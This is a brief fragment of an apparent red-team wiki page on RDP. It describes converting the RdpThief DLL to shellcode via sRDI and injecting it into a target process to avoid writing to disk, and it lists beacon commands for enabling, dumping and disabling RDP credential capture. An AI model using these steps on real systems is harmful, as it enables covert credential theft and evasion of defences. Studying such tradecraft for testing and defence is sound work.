RDP
Remote Desktop Protocol
RdpThief
The DLL can be converted to shellcode with ConvertToShellcode.py (sRDI approach) and then be injected into the target process. That would help to avoid dropping the DLL to disk:
beacon> rdpthief_enable
beacon> rdpthief_dump
beacon> rdpthief_disableAbusing CredSSP / TSPKG
Last updated